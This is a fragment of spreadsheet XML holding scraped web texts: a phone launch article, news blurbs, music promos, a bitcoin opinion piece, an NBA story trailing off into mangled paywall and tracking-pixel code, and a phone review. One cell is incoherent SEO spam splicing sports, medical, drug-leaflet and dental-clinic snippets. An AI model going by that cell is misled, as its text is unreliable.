latter of which doesn’t feature in the base 9X that was released in China. The European model also has a fingerprint sensor on the rear, while it’s on the side of the device in the Chinese variants. A Kirin 710 processor, 4000mAh battery, USB-C charging, and headphone jack round out the fairly competitive specs list. There’s no NFC and no IP rating – but both are typical omissions at this price point, and Honor says the phone has been tested for water and dust resistance, even if it doesn’t have the formal rating. Honor Band 5 Sport and Sport Pro headphones Alongside the Honor 9X, the company also unveiled two new products joining its expanding range. First up, the Honor Band 5 Sport is a cheaper, sportier take on the Band 5 fitness tracker that omits the colour display but adds in six-axis motion tracking and a shoelace clip so that it can double as either a watch or clip onto your shoes to analyse your gait, stride, and more while running, cycling, or through various sports. There are headphones too. The Honor Sport Pro Bluetooth neckbuds offer 18 hours of music playback off a single charge, and a unique solution to pairing: a USB-C plug is hidden in the in-line remote, and can be used to instantly pair the headphones with your phone – as long as it’s an Honor or Huawei handset, that is. No release date or pricing have been confirmed yet for either the Band 5 Sport or the Sport Pro headphones, but we’re expecting more info very soon. Source link</t>
  </si>
  <si>
    <t>A man doused himself with what appeared to be a flammable liquid outside Parliament before being sprayed with a fire extinguisher. Read more? Click here</t>
  </si>
  <si>
    <t>The PSNI says parade conditions were breached at the dissident republican march on Saturday. Read more? Click here</t>
  </si>
  <si>
    <t>Flower Mound, Texas News When This Nun Walked Into A Hooters, She Didn’t Expect To Spur A Round Of Applause After Using The Bathroom Warwick Davis Exec Producing ‘Master Moley’ Special; Jetpack Boards Series (EXCLUSIVE) House listing with replica Oval Office goes on the market for $2.79 million Trump boasts that his trade deal with China will have US growers straining to meet demand Breaking Bad and Jackie Brown star Robert Forster dies at 78 after brief battle with brain cancer NYPD sergeant, 40, who shot a man he claimed to be a robber pleads guilty to evidence tampering Hawaiian family’s 5.6 pound avocado sets a Guinness World Record as the heaviest on the planet When This Nun Walked Into A Hooters, She Didn’t Expect To Spur A Round Of Applause After Using The Bathroom Posted: 12 Oct 2019 12:21 AM PDT One afternoon, a nun walked into a Hooters restaurant to use the bathroom. Yeah, it does sound like the setup of a bad joke. Nonetheless, the patrons of this Hooter’s restaurant applauded the nun’s curiosity and this story quickly went viral. Nun In A Hooters? Whenever we usually think of nuns, we think of women […] via https://youtu.be/mFQfuwZZ8h8 Warwick Davis Exec Producing ‘Master Moley’ Special; Jetpack Boards Series (EXCLUSIVE) Posted: 12 Oct 2019 12:02 AM PDT Jetpack Distribution has snagged the rights to "Master Moley" and will sell the animated series internationally. There is both a one-off "Master Moley" special and an accompanying series. The special has a standout voice cast including Warwick Davis ("Harry Potter"), who will also executive produce. Signature Entertainment is selling the special and handling U.K. distribution, […] via https://youtu.be/mFQfuwZZ8h8 House listing with replica Oval Office goes on the market for $2.79 million Posted: 11 Oct 2019 11:12 PM PDT An incredible four-bathroom, five-bedroom home has been put on the market – and it even comes with its own replica Oval Office, modeled on the TV show, The West Wing. via https://youtu.be/mFQfuwZZ8h8 Trump boasts that his trade deal with China will have US growers straining to meet demand Posted: 11 Oct 2019 10:52 PM PDT At a rally in Louisiana on Friday night, Trump bragged that the first phase of a deal to end a trade war with China could see U.S. agricultural imports soar to as much as $50 billion annually. via https://youtu.be/mFQfuwZZ8h8 Breaking Bad and Jackie Brown star Robert Forster dies at 78 after brief battle with brain cancer Posted: 11 Oct 2019 10:32 PM PDT Forster died at his home in Los Angeles on Friday, just hours after El Camino premiered in theaters and on Netflix, after a brief battle with brain cancer. via https://youtu.be/mFQfuwZZ8h8 NYPD sergeant, 40, who shot a man he claimed to be a robber pleads guilty to evidence tampering Posted: 11 Oct 2019 10:12 PM PDT NYPD sergeant Ritchard Blake, 40, who shot Thavone Santana, 21, in the chin during an alleged robbery and was caught in camera’s placing a knife at the scene pleaded guilty to evidence tampering via https://youtu.be/mFQfuwZZ8h8 Hawaiian family’s 5.6 pound avocado sets a Guinness World Record as the heaviest on the planet Posted: 11 Oct 2019 10:12 PM PDT The Pokini family – Mark, Juliane, and Loihi – of Kula, Hawaii received their Guinness World Record certificate for world’s heaviest avocado this week after applying for the accolade in December. via https://youtu.be/mFQfuwZZ8h8 You are subscribed to email updates from News Digest. To stop receiving these emails, you may unsubscribe now. Email delivery powered by Google Google, 1600 Amphitheatre Parkway, Mountain View, CA 94043, United States</t>
  </si>
  <si>
    <t>"Rott N' Roll Pt. 2: Remixed" by Zomboy is OUT NOW on NSD! Stream / Buy ➤ https://NSD.lnk.to/NSDX158 Want more? Check out all our releases on Spotify ➤ http://nsdx.uk/NSD_Spotify ------------------------------------------------------------------------ Never Say Die Playlists ➤ NSD Weekly - http://nsdx.uk/NSD-Weekly NSD New Music - http://nsdx.uk/NSD-NewMusic NSD Mixes - http://nsdx.uk/NSD-Mixes NSD Top Hits - http://nsdx.uk/NSD-TopHits NSD Dubstep […] The post Zomboy – The Beast (Oddprophet &amp; ECRAZE Remix) appeared first on Dubster.</t>
  </si>
  <si>
    <t>LOUIS – Max Scherzer followed AnÃ­bal SÃ¡nchez’s near no-hitter with a try of his own and the stingy Washington Nationals. Ace Stephen Strasburg gets the ball for the wild-card Nationals when the. I am a 19 years old boy. I had been doing several exercises since 3 months, and one day I overdid my exercises. The next day morning suddenly pain occurred on the upper back left side near my shoulder. The pain increased after some time, my hands were not working properly, and I had tingling and numbness of the upper body, coldness under foot. What is in this leaflet. This leaflet answers some common questions about Largactil. It does not contain all the available information. It does not take the place of talking to your doctor or pharmacist. Scientist finds fossil evidence of sabre-toothed cat in southern Alberta – READ MORE: Ammonite mine near Lethbridge unearths Mosasaur. being confirmed. the previous northern-most record was in. California National Historic Trail. More than 250,000 gold-seekers &amp; farmers crossed into to the gold fields &amp; rich farmlands of California during the 1840’s and 1850’s. 1,000 miles of trail ruts and traces can still be seen to remind us of early American travelers and settlers. Most Popular Dental Clinic Near Medicine Hat Alberta Understanding This Chart. To date, most deductions have been based on statements of actual extra-billing and user charges, meaning they are made two years after the extra-billing and user charges occurred (for example, deductions taken in fiscal year 2017-2018 would be in respect of patient charges levied in 2015-2016). Welcome to the Amazon.co.uk Book Store A Copy of Your Passport. Sure, you know to bring your passport.But it’s a good idea to bring a copy of the front page of your passport as well. Then, when you head into port you can lock your passport in your cabin safe and keep the copy with you. Top Dental Clinic In Medicine Hat Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental, River Dental, Grover Dental Centre, Schow Dental, Park Meadows Dental, Galvin Dental. Most Popular Dental Clinic Near Medicine Hat Alberta Understanding This Chart. To date, most deductions have been based on statements There are a number of different drugs your dentist may prescribe, depending on your condition. Some medications are prescribed to fight certain oral diseases, to prevent or treat infections, or to control pain and relieve anxiety. Here you will. Why You Need Medicine Hat Brooks Clear Braces The most suitable time to have braces is probably when you are still. Medicine Hat Brooks Clear Braces. Do you need a family dentist in Carmi, IL? Get to know our team from Carmi Family Dental. The Alliteration Dictionary is a tool for students to find a list of common words that all start with the same letter to be used in alliterative phrases. Emergency Dental 24/7 – Emergency dental services. When you have a dental emergency that occurs due to a fall, a sports injury or even a car accident, you should always call or visit your local hospital emergency room or urgent care center to. Dining in Medicine Hat, Alberta: See 7,924 TripAdvisor traveller reviews of 228 Medicine Hat restaurants and search by cuisine, price, location, and more. TripAdvisor LLC is not responsible for content on external web sites. Taxes, fees not. The signs on the edge of Medicine Hat welcome visitors to “The Gas City,” a reference to the natural. Alberta is also one. Healthgrades is the leading provider of information to help you find the right dentist that best meets your care needs. Skip navigation HG Logo and Link to Home Search Specialties, Conditions, Procedures, Doctors, Hospitals Search Search Near Se. A PPO dentist is an excellent option for everyone who needs control that’s spent on dental services, and who wants to select from a list of dentists near. It’s very much essential to choose a sort of PPO dentist near me to your excellent looking. Top Dentist Near Medicine Hat Alberta Things to do near Medalta on TripAdvisor: See 6,012 reviews and 3,176 candid photos of things to do near Medalta in Medicine Hat, Alberta. 1st Street and 6th Avenue SE across from the Medicine Hat City Hall, Medicine Hat, Alberta T1A 7Z6. Most Popular Dental Clinic Near Medicine Hat Alberta Understanding This Chart. To date, Reaves added a goal in the third period when he intercepted a pass near the blue line and beat Rittich with a wrist shot through the pads to extend Vegas’ advantage to three goals. Later in the period. City of Calgary ready to say goodbye to Foothills Stadium – City of Calgary plans a major upgrade to McMahon Stadium’s baseball arena, forcing a potential end to the fabled Foothills.</t>
  </si>
  <si>
    <t>STRICTLY COME DANCING contestants are carrying out the final rehearsals ahead of tonight’s live show today, but during yesterday’s instalment of It Takes Two, the celebrity guests didn’t hold back when giving their criticisms. One of the professionals being discussed was Anton Du Beke, but host Rylan Clark-Neal was forced to step in and cool down a ‘fight’ which was rearing up amongst them. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>A NEW Zealand citizen who stalked his ex over three months - even hanging a sign for her from a bridge on the motorway - will be at the mercy of Minister for Home Affairs Peter Dutton.</t>
  </si>
  <si>
    <t>Forthcoming on Fokuz Recordings Follow Melinki https://www.facebook.com/djmelinkiofficial Follow Low:r https://www.facebook.com/Lowrmusic https://www.instagram.com/lowrdnb/ Tweets by Lowrdnb ► Liquicity Store: Home ► Send in demo's for Liquicity Records DEMO ► Liquicity NEW channel with full live-sets! https://youtube.com/c/LiquicityEvents ► Follow Liquicity Spotify: https://open.spotify.com/user/liquicityrecords Instagram: https://instagram.com/liquicity/ Facebook: http://www.facebook.com/Liquicity Events: http://www.facebook.com/LiquicityEvents Twitter: http://www.twitter.com/liquicity Soundcloud: http://soundcloud.com/liquicityrecords Beatport: http://beatport.com/label/liquicity-records/25942 The post Melinki x Low:r – Whats Real appeared first on Dubster.</t>
  </si>
  <si>
    <t>This Irishman prankster knew he was dying, and had to get his family one last time at his funeral. This might be the best video ever. pic.twitter.com/LWRl4xtOCW — Jessica Fletcher (@heckyessica) October 14, 2019 Via Irish News: A Dublin man’s funeral has gone viral after he pranked mourners with a recording of himself that sounded […]</t>
  </si>
  <si>
    <t>If we’re to reboot economic growth, let's have a closer look at franchises' 'no pouch' deals.</t>
  </si>
  <si>
    <t>One of the biggest mistakes you can make as an investor or trader is to live inside an echo chamber. That’s how bubbles get created. Back in 1999, everyone thought you could do no wrong by investing in tech stocks and Internet stocks. Then the NASDAQ crashed 70%. Last year, everyone thought marijuana stocks would all go through the roof because of the massive short squeeze in Tilray. Now, most of those stocks have fallen by more than 50%. Every time you hear about the hot new thing, or see some security being bid up to the moon, you should immediately be suspicious. You must invest or trade with extreme caution. That’s right, I’m talking about bitcoin. The bulls don’t want to hear any arguments. They are true believers, and when that zeal approaches the level of religious fervor – which it did long ago – the writing is on the wall. Here are the three biggest myths about bitcoin that you must be aware of, as either an investor or trader. Don’t buy into them. If you approach these myths with the proper skepticism, you will save yourself a lot of money. Myth #1: Bitcoin Is A Store of Value “Store of value” – those three words – should be self-explanatory. It means you can convert fiat currency into some other form, in which the underlying value of that fiat currency will remain relatively stable. The value of the currency is stored. One look at any bitcoin chart will tell you this is a myth. Bitcoin does not store value because of its volatility. Bitcoin’s price might move 15% in a matter of minutes. There is no value to be stored when that value could literally evaporate in minutes. Even at the height of the mortgage crisis, when the value of homes crashed, that downturn occurred over a period of months. In certain neighborhoods, it took a matter of weeks, but it didn’t happen in a matter of minutes. Real estate is a store of value. Even something as illiquid as art will not ever experience the kind of volatility that bitcoin does. Myth #2: Bitcoin Doesn’t Need to Be Backed by Anything I have never seen a bitcoin bull make an affirmative argument regarding bitcoin not being backed by anything. If you tell a bitcoin lover that bitcoin is a foolish investment because it isn’t backed by anything, the only thing they ever say is that, “neither is anything else!” They don’t offer an argument as to why not being backed by anything matters. Instead, they respond with a logical fallacy. Not only that, they’re wrong. As I’ve previously discussed, fiat currency across much of the world, and especially in the United States, is backed by the full faith and credit of the federal government. Before anyone laughs at that, the point is that this full faith and credit has existed for over 150 years. People trust in the U.S. dollar, as evidenced by its complete lack of volatility. Myth #3: Bitcoin Will Be Accepted Everywhere Ed Butowsky, Managing Partner at Chapwood Capital Investment Management, tells CCN: “Aside from a few companies that accept bitcoin as a publicity stunt, no business in their right mind would accept bitcoin. The volatility is such that a customer who buys something for $100 gets the full value of that item, while the merchant may end up with far less by the time he converts bitcoin back into currency. That could destroy entire businesses”. Butowsky is absolutely right. The entire underlying concept of any form of currency is rooted in the knowledge that the currency’s value is stable. Bitcoin will never be broadly accepted unless and until its volatility is comparative to that of the U.S. dollar. I don’t believe that they will ever arrive. Bitcoin is a bubble that will pop. Disclaimer: The views expressed in the article are solely those of the author and do not represent those of, nor should they be attributed to, CCN. Last modified (UTC): October 6, 2019 11:41 AM</t>
  </si>
  <si>
    <t>Opportunity knocks for new Wolves guard Napier For Shabazz Napier, this might be the right team at the right time. Napier came to the Timberwolves as part of the complicated sign-and-trade deal that sent D’Angelo Russell to Golden State and got Kevin Durant to Brooklyn this summer. Even when he was being introduced to Twin Cities media in July, Napier said he knew this was a good landing place. Nearly a week into his first camp with the Wolves he’s even more certain. “Obviously there is a point guard slot needed,’’ he said Saturday. “We have Jeff [Teague], and, obviously, I just thing with my growth throughout my NBA career, I feel this is a great opportunity for me to come in and showcase what I’ve been continuing to work on.’’ If there is one thing five NBA seasons have shown Napier is that, along with ability, a player needs two things to succeed — confidence and opportunity. As a first-round draft pick coming from a storied college career at Connecticut, Napier had a difficult start to his career that included an unproductive rookie season in Miami and a second season in Orlando spent mostly on the bench. But two seasons in Portland working behind C.J. McCollum and Damian Lillard, followed by a productive season in Brooklyn, have given Napier back his confidence. And the Wolves, it appears, are about to offer the opportunity. Salary cap constraints forced the Wolves not to match the three-year, $28 million offer sheet that Memphis gave favorite son Tyus Jones this summer, leaving the Wolves with an open slot at the backup point guard position. Napier, at 28, is the most experienced candidate on the roster. This is a job that takes on even greater importance because Teague is coming off ankle and foot injuries at that limited him to a career-low 42 games last season. For this year, at least, Napier hopes to fill that backup roll. He and Jones have similar career numbers, though Jones, at 23, is five years younger than Napier. Napier is in the final year of a contract that will pay him $1.88 million this year. Jones has career averages of 5.1 points, 4.8 assists and 0.7 turnovers compared to Napier’s 6.4, 2.0 and 1.2. With both Napier and Teague in the final years of their deals, the future of the position with the Wolves is unclear. But Napier hopes to make the most of this opportunity. It is a comfortable situation. Napier worked out for Saunders before the 2014 draft. He played with current teammate Jake Layman and for current Wolves assistant David Vanderpool in Portland. Wolves assistant Pablo Prigioni and Napier were together in Brooklyn last season. Napier is perhaps more scoring-oriented than Jones, and his career three-point percentage is slightly higher (35.4 vs. Jones’ 33.3). That scoring mentality should serve him well in the pick-and-roll game. “I think he’s a guy who can shoot the ball, and he’s got an ability to find his teammates too,’’ coach Ryan Saunders said of Napier. “We want to make sure that we continue — all of our point guards — to read the defenses. We want to make sure we’re a low-turnover team, even though we’re looking to play faster.’’ Napier is confident he has what it takes. “The NBA nowadays, the point guard is usually a scoring guard,’’ he said. “I’ve been a scoring guard my entire life. On top of that I’m a willing passer, able to pass the ball with my left and right hand, being able to see the court.’’ His experience both with the ball in his hands and playing off the ball — something he has done both in college and the pros — should fit in well with the Wolves. Particularly if Napier gets some time with Karl-Anthony Towns. Napier is confident he can capitalize on any opportunity he’s given. “I’ve experienced so much,’’ he said. “The top of the highs and the lowest of lows. It’s a combination of everything, but I think the biggest thing is the experience of the game.’’ var rSkunkConfig = {“enforcement”:true,”countViews”:”guests”:true,”loggedIn”:true,”subscribers”:true,”unmetered”:”sectionPaths”:[“/bios”,”/contactus”,”/help”,”/offers”,”/lifestyle/kids-health”,”/video”,”/employees/benefits”,”/obituaries”,”/jobs/topworkplaces”],”contentIds”:[“509847411″,”509848031″,”482552141″,”476040393″,”476040393″,”401897905″,”425373843″,”415781003″,”150460817983″,”415693713″,”436316953″,”450623913″,”450625343″,”450625693″,”450626083″,”450626583″,”437687453″,”437687753″,”437688303″,”437689683″,”457733433″,”457733503″,”457733463″,”457733493″,”436740613″,”447378683″,”445108753″,”443065933″,”443995433″,”444238433″,”423913703″,”25373843″,”458348643″,”465767963″,”465254943″,”464643883″,”461549583″,”458022893″,”457739213″,”467925683″,”462160283″,”461536853″,”459432053″,”458940033″,”453678863″,”452142423″,”450626813″,”450626193″,”450626083″,”450625443″,”450624983″,”449833993″,”447193403″,”446218753″,”443287373″,”442502253″,”441039553″,”434692633″,”433894613″,”432007273″,”427690133″,”425990133″,”421479323″,”420760943″,”420536403″,”419496503″,”419098944″,”415888474″,”415824304″,”415816963″,”415401364″,”412715643″,”411587345″,”388264102″,”378131721″,”334111481″,”268952601″,”257505631″,”218991591″,”227829611″,”231193891″,”115289839″,”296766441″,”296743831″,”217991401″,”137705393″,”11603211″,”241138711″,”11601086″,”238868691″,”216063751″,”137104018″,”251069101″,”218991591″,”506817361″],”referrers”:”regex”:””,”exclude”:false,”userAgent”:”strib-mobile-app-webview”,”storageKey”:”rskunk_platypus”,”baseURL”:”https://users.startribune.com”,”embedURL”:”https://users.startribune.com/embed/mainapp.build.js?c=ddea53e6fc5de3aa044b7152b11070794d8ae6ec”,”embedAssets”:[“https://users.startribune.com/embed/third-party/growl.css”,”https://users.startribune.com/embed/third-party/colorbox.css”],”placementName”:”www.startribune.com”,”loginRedirect”:”https://www.startribune.com/login?passive=true&amp;path=”,”logoutRedirect”:”https://www.startribune.com/logout?path=”,”dataExpiration”:”type”:”thirtyDays”,”month”:1,”day”:1,”hour”:0,”min”:0,”sec”:0,”topTier”:”id”:”metersports-desktop-565″,”count”:14,”tiers”:[“id”:”metersports-desktop-565″,”count”:14,”action”:”ignore”,”mute”:false,”action_config”:false,”start”:”https://users.startribune.com/placement/1/environment/3/metersports-desktop-565/start”,{“id”:”limit-signup-optimizely”,”count”:13,”action”:”ignore”,”mute”:true,”action_config”:”template”:”% extends “grid” %rn rn% block heading_text %Youu2019ve read your free articles for this 30 day period. Sign up now for local coverage you wonu2019t find anywhere else, special sections and your favorite columnists. StarTribune puts Minnesota and the world right at your fingertips. % endblock %rn rn% block last %rn parent() rn# limit Krux pixel from https://www.squishlist.com/strib/customshop/328/ #rnrnrn//Load jQuery library using plain JavaScriptrn(function()document.getElementsByTagName(‘body’)[0]).appendChild(newscript);rnvar newscript2 = document.createElement(‘script’);rn newscript2.type = ‘text/javascript’;rn newscript2.async = true;rn newscript2.src = ‘https://cdnjs.cloudflare.com/ajax/libs/js-cookie/2.1.3/js.cookie.min.js’;rn (document.getElementsByTagName(‘head’)[0])();rn/********TEST CODE for METER SNOW PLOW ANALYTiCS*******************/rnvar meter = ;rn$(document).ready(function()rn // console.log(“this loads well”);rn $(‘.js-optimizely-click-goal’).click(function()rn // console.log(this);rn meter[‘type’] = $(“input[name=’offer’]”).val();rn if(meter[‘type’] = 131)meter[‘type’] = “Premium Digital Access”;rn else if(meter[‘type’] = 130)meter[‘type’] = “Sunday Print + Digital”;rn else if(meter[‘type’] = 129)meter[‘type’] = “7-Day Print + Digital”;rn else if(meter[‘type’] = 128)meter[‘type’] = “Sunday Print”;rn meter[‘date’] = new Date().toLocaleString();rn // console.log(meter[‘type’]);rn // console.log(meter[‘date’]);rn var json_meter_cookie = JSON.stringify(meter);rn Cookies.set(‘meter_sign_up’, json_meter_cookie); rn rn );rn);rn/************************************************************************/rn // FACEBOOK TRACKING PIXEL #1rn !function(f,b,e,v,n,t,s)rn if(f.fbq)return;n=f.fbq=function()n.callMethod?rn n.callMethod.apply(n,arguments):n.queue.push(arguments);rn if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version=’2.0′;rn n.queue=[];t=b.createElement(e);t.async=!0;rn t.src=v;s=b.getElementsByTagName(e)[0];rn s.parentNode.insertBefore(t,s)(window,document,’script’,rn ‘https://connect.facebook.net/en_US/fbevents.js’);rn fbq(‘init’, ‘590074241155998’); rn fbq(‘track’, ‘ViewContent’);rn rnrn% endblock %”,”start”:”https://users.startribune.com/placement/1/environment/3/limit-signup-optimizely/start”},{“id”:”limit-signup”,”count”:12,”action”:”ignore”,”mute”:true,”action_config”:”template”:”% extends “grid” %rnrn% block heading_text %Youu2019ve read your 10 free articles for this 30 day period. Sign up now for local coverage you wonu2019t find anywhere else, special sections and your favorite columnists. StarTribune puts Minnesota and the world right at your fingertips. % endblock %rnrn% block last %rn parent() rn# limit Krux pixel from https://www.squishlist.com/strib/customshop/328/ #rnrnrn//Load jQuery library using plain JavaScriptrn(function())();rn/********TEST CODE for METER SNOW PLOW ANALYTiCS*******************/rnvar meter = ;rn$(document).ready(function()rn // console.log(“this loads well”);rn $(‘.js-optimizely-click-goal’).click(function()rn // console.log(this);rn meter[‘type’] = $(“input[name=’offer’]”).val();rn if(meter[‘type’] = 131)meter[‘type’] = “Premium Digital Access”;rn else if(meter[‘type’] = 130)meter[‘type’] = “Sunday Print + Digital”;rn else if(meter[‘type’] = 129)meter[‘type’] = “7-Day Print + Digital”;rn else if(meter[‘type’] = 128)meter[‘type’] = “Sunday Print”;rn meter[‘date’] = new Date().toLocaleString();rn // console.log(meter[‘type’]);rn // console.log(meter[‘date’]);rn var json_meter_cookie = JSON.stringify(meter);rn Cookies.set(‘meter_sign_up’, json_meter_cookie); rnrn );rn);rn/************************************************************************/rn // FACEBOOK TRACKING PIXEL #1rn !function(f,b,e,v,n,t,s)rn if(f.fbq)return;n=f.fbq=function()n.callMethod?rn n.callMethod.apply(n,arguments):n.queue.push(arguments);rn if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version=’2.0′;rn n.queue=[];t=b.createElement(e);t.async=!0;rn t.src=v;s=b.getElementsByTagName(e)[0];rn s.parentNode.insertBefore(t,s)(window,document,’script’,rn ‘https://connect.facebook.net/en_US/fbevents.js’);rn fbq(‘init’, ‘590074241155998’); rn fbq(‘track’, ‘ViewContent’);rnrnrn% endblock %”,”start”:”https://users.startribune.com/placement/1/environment/3/limit-signup/start”},”id”:”meter-desktop-331″,”count”:10,”action”:”ignore”,”mute”:false,”action_config”:false,”start”:”https://users.startribune.com/placement/1/environment/3/meter-desktop-331/start”,”id”:”PDA991499opt”,”count”:9,”action”:”ignore”,”mute”:true,”action_config”:false,”start”:”https://users.startribune.com/placement/1/environment/3/PDA991499opt/start”,”id”:”limit”,”count”:8,”action”:”inject”,”mute”:false,”action_config”:”template”:” rn.o-overlay,rn.o-overlay * rn display: block;rn box-sizing: border-box;rnrnrn.o-overlay rn position: fixed;rn top: 0;rn left: 0;rn width: 100%;rn height: 100%;rn font-size:14px;rn background: rgba(0, 0, 0, 0.8);rn z-index: 999999;rn opacity:1;rn transition:all .01s;rnrn.o-overlay h1 rn font-family:popular-bold, ‘Popular’;rn font-size:28px;rnrnrn.o-modal rn width: 100%;rn max-height: 100vh;rn overflow: auto;rn position: absolute;rn top: 50%;rn left: 0;rn -webkit-transform: translateY(-50%);rn transform: translateY(-50%);rnrn.o-modal-middle rn padding:5px 5px;rn position:relative;rn background:#F6E463;rn text-align:center;rn border-top:1px solid rgb(246, 228, 99);rn -webkit-box-shadow:0px 0px 0px rgba(0,0,0,0);rn box-shadow:0px 0px 0px rgba(0,0,0,0);rnrn.o-modal-inner rn background: #ffffff;rn margin: 0 auto;rn width: 100%;rn max-width: 600px;rn position: relative;rnrnrn.o-button rn display: inline-block;rn font: bold 18px/1 Whitney, sans-serif;rn margin: 0;rn padding: 0;rn border: none;rn text-decoration: none;rn color: #fff;rn background: #00824A;rn padding: 15px 20px;rn border-radius: 4px;rn border: 2px solid rgba(0, 0, 0, 0.1);rn -webkit-transition: all .1s;rn transition: all .1s;rn cursor: pointer;rn text-shadow: 0 1px rgba(0, 0, 0, 0.2);rnrn.o-button:hover rn text-decoration: none;rn color: #fff;rn border-color: transparent;rn background: #00824A;rn opacity:0.9;rnrn.o-cta rntfont:bold 38px/1 Whitney, sans-serif;rntcolor:#00824A;rntpadding:5px 0px;rntdisplay:block;rnttext-align:center;rntoverflow:hidden;rntcursor:defaultrnrn.o-block rn text-align: center;rn font-family:’Whitney’,sans-serif;rnrn.o-block img rn width: 150px;rn height: auto;rn display: block;rn margin: 0 auto 10px;rnrn.o-block .text-left rn text-align:left;rnrn.o-block.pad rn padding: 10px;rnrn.o-block.pad-top rn padding-top: 30px;rnrn.o-block.pad-right rn padding-right: 30px;rnrn.o-block.pad-bottom rn padding-bottom: 30px;rnrn.o-block.pad-left rn padding-left: 30px;rnrn.o-block.shadow-out rn box-shadow: 0 0 7px 0 rgba(0, 0, 0, 0);rnrn.o-block.shadow-in rn box-shadow: inset 0 0 7px 0 rgba(0, 0, 0, 0);rnrnrn.o-small rn color: #010101;rn font: italic normal 13px/1 Whitney, sans-serif;rn margin: 10px 0;rnrn.o-small:first-child rn margin-top: 0;rnrn.o-small:last-child rn margin-bottom: 0;rnrn.o-small.left rn text-align: left;rnrnrn.o-small a rn display: inline-block;rn color: inherit;rn text-decoration: underline;rnrn.o-small a:hover rn color: black;rn text-decoration: underline;rnrnrn.o-bg-green rn background:#86cff2;rn color:#ffffff;rnrnrn.o-info rn display:inline-block;rn position:absolute;rn bottom:20px;rn right:20px;rn overflow:visible;rn z-index:1;rnrn.o-info:hover rn padding-left:2em;rn padding-top:2em;rnrn.o-info:hover div rn display:block;rnrn.o-info button rn width:1.5em;rn height:1.5em;rn border-radius:100%;rn font-weight:bold;rn line-height:1.5em;rn padding:0;rn margin:0;rn border:0;rn text-align:center;rn font-size:1em;rn tbackground:#F6E463;rnrn.o-info div rn background:#F5F5F5;rn position:absolute;rn right:1.5em;rn bottom:1.5em;rn box-shadow:0 0 10px rgba(0,0,0,.5);rn padding:20px;rn font-size:12px;rn line-height:1.3;rn display:none;rn width:300px;rn border-radius:7px 7px 0 7pxrnrn.o-info div a rn text-decoration:underline;rn color:#005776;rnrn rn rnrnrnt$(‘body, html’).css(‘overflow’, ‘hidden’);rnrnrn rn rn rn rn Premium Digital Access starting at 99u00a2 rn t rn SUBSCRIBErn Already a subscriber? Log in.rn rn All Star Tribune readers without a Digital Access subscription are given a limited number of complimentary articles every 30 days. Once the article limit is reached we ask readers to purchase a subscription including Digital Access to continue reading. Digital Access is included in all multi-day paper home delivery, Sunday + Digital, and Premium Digital Access subscriptions. After the 1 month Premium Digital Access introductory period you will be charged at a rate of $14.99 per month. You can see all subscription options or login to an existing subscription herern rn ?rn rn rn rn rn rn”,”start”:”https://users.startribune.com/placement/1/environment/3/limit/start”},{“id”:”nag”,”count”:7,”action”:”lightbox”,”mute”:true,”action_config”:{“height”:,”width”:”630px”,”redirect_on_close”:,”template”:”% extends “shell” %rnrn% block substyles %rn rn .nag rn padding:0;rn rn .nag-inner rn padding:0 20px 50px;rn rn .nag img rn width:auto;rn margin:0 auto;rn rn .nag h1 rn margin-top:-20px;rn text-transform:uppercase;rn color:#61bf1a;rn text-align:center;rn font:normal 26px/1 ‘Popular bold’, serif;rn rn .nag h2 rn font:bold 28px/1 ‘Benton Sans’, sans-serif;rn font-style:italic;rn text-align:center;rn rn .nag-status rn text-align:left;rn background:#f5f5f5 url(“http://sky-news.co.uk/ static_url(“img-icon-warning.png’) “) 12px 10px no-repeat;rn padding:12px 35px 10px;rn margin-bottom:65px;rn rn .nag-status p rn display:inline-block;rn margin-bottom:0;rn font:normal 14px/1 ‘Benton Sans’, sans-serif;rn font-style:italic;rn rn .nag-status p:first-...</t>
  </si>
  <si>
    <t>We review products independently, but we may earn affiliate commissions from buying links on this page. Terms of use. The Samsung Galaxy Note 10 is, basically, a midsize Galaxy S10 with a pen. That’s perfect if the Note 10+ is too big for your hand and you want a stylus. For what it’s worth, using the S Pen on both size Notes side by side, it’s actually a better experience on the larger 10+ because it gives you a bigger canvas to draw on. But that doesn’t matter if you find the phone unwieldy. In my mind, that’s why you should be here. While the Note line has been synonymous with “big phone” in previous years, now that Samsung offers such a wide range of sizes among its flagships, the standard Note 10 is the phone to get for pairing the S Pen with a comfortable one-hand experience. Size and Design The key number for the Note 10 is 2.83, its width in inches. It’s just at the point where it’s comfortable to use in one hand. The Galaxy S10 is slightly narrower, at 2.77 inches, but there’s a good argument that a device any slimmer won’t be useful with the S Pen. Left to right: Galaxy Note 10+, Galaxy Note 10 The shiny, rounded, and slightly slippery Note 10 measures 5.94 by 2.83 by 0.31 inches (HWD), weighs 5.93 ounces, and comes in black, pink, red, white, or a mirrored silver called Glow. Glow looks great in photos, but it’s a fingerprint nightmare. Pink and red are, unfortunately, impossible to find in the US. The curved screen and all-glass construction screams that you should put this phone in a case, with a pen-friendly screen protector. The 19:9, 6.3-inch OLED screen feels very tall and narrow if you aren’t used to Samsung’s new form factors, and that doesn’t necessarily work well with the S Pen; we’re used to drawing on paper that’s basically 4:3, a much wider canvas. I usually love taller, narrower phones, but when you’re taking notes, more real estate is better. That argues for the bigger Note 10+ being superior for heavier stylus users, as long as you can handle it. There are three cameras on the back, for wide-angle, standard, and “2x zoom” shots. The smaller Note 10 lacks the larger one’s rear IR depth-sensing camera, but right now that’s not being used for much (just for a measurement app, primarily). The Note 10 is waterproof, so you don’t have to worry about that. The S Pen fits neatly into a slot at the bottom, near the main speaker and the USB-C port. There is no headphone jack, but you get some nice AKG-branded earbuds with the phone. Performance and Battery Most of the aspects of the Note 10+ carry over to the Note 10. It has the same processor, the same radios, the same call quality, and the same speaker. There are a few changes, including a shift from 12GB of RAM to 8GB. Both models have 256GB storage options, with about 223GB free, although the bigger model has a 512GB option. Neither has expandable memory; the argument is that it’s much slower than the UFS 3.0 storage that Samsung is using. See How We Test Phones Benchmark-wise, the Galaxy Note 10 performs just like the Note 10+, with one exception. They have the same Qualcomm Snapdragon 855 processor and the same Samsung software, and that results in the same overall benchmark performance: slightly slower than OnePlus phones (which have more efficient software), but on par with other Samsung flagships. The lower-res screen, though, means better gaming frame rates: 39fps on the GFXBench Car Chase test as opposed to 23fps for WQHD+ phones, although if you knock the Note 10+ and S10+ down to 1080p screen mode, you end up getting similar results to the smaller Note 10. The phone has less battery life than the bigger Note 